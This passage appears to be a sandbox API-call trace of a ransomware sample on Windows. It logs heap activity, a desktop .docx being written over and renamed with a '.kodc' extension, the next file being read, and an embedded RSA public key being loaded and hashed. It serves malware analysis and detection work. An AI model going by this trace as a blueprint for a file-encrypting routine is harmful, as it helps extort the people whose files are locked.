RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.687] GetCurrentThreadId () returned 0x42c [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6a0 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333feb8 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.691] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x17edb, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x17edb, lpOverlapped=0x0) returned 1 [0097.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.691] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17ee0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.691] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.691] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.692] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.692] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.692] CloseHandle (hObject=0x5cc) returned 1 [0097.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.693] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dSzm6_6rQ5oFPRjOyx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dszm6_6rq5ofprjoyx.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dSzm6_6rQ5oFPRjOyx.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dszm6_6rq5ofprjoyx.docx.kodc")) returned 1 [0097.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.694] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.695] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18a08fd0, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x2fe047d0, ftLastAccessTime.dwHighDateTime=0x1d5b91f, ftLastWriteTime.dwLowDateTime=0x2fe047d0, ftLastWriteTime.dwHighDateTime=0x1d5b91f, nFileSizeHigh=0x0, nFileSizeLow=0xa4e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gNI2 7WqYz3wxiIDKTyj.m4a", cAlternateFileName="GNI27W~1.M4A")) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.696] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gNI2 7WqYz3wxiIDKTyj.m4a") returned=".m4a" [0097.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gNI2 7WqYz3wxiIDKTyj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gni2 7wqyz3wxiidktyj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.696] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=42211) returned 1 [0097.696] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.699] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa4bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.699] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.700] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.700] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xa4e3, lpOverlapped=0x0) returned 1 [0097.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.701] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.702] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.702] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.702] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.702] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.702] GetLastError () returned 0x0 [0097.702] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.702] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.702] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.702] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.702] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa4e0) returned 0x9ba4d90 [0097.703] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333feb8 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ff00 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.703] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6a0 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a688 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.705] HeapFree (in: 